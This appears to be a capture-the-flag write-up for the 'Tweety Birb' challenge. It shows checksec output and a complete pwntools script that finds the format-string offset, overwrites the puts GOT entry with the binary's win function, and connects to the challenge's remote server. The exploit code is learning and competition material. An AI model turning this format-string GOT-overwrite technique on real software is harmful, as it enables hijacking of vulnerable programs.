Tags: pwntools canary format-string pwn
Rating:
## Challenge
For challenge file you can convert following from base64 [Tweety Birb Base64.txt](https//gist.githubusercontent.com/ebubekirtrkr/b65364871463ac3288f00a85a79634a4/raw/6accc617d5b792ddacbd7b8babea2eb8b8b17786/base64.txt)
## Solve
### Checksec for binary
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
```
Since it has format string vuln and it has `Partial RELRO` we can easily solve with pwntools format string tool by overriding got entry.
```py
from pwn import *
context.log_level="debug"
elf = ELF("./tweetybirb")
context.arch=elf.arch
def exec_fmt(payload):
p = elf.process()
p.clean()
p.sendline(payload)
return p.recvline()
autofmt = FmtStr(exec_fmt)
offset = autofmt.offset #6
p = remote("143.198.184.186", 5002)
p.clean()
payload = fmtstr_payload(offset, {elf.symbols["got.puts"]: elf.symbols["win"]})
p.sendline(payload)
p.interactive()
print(p.clean())
```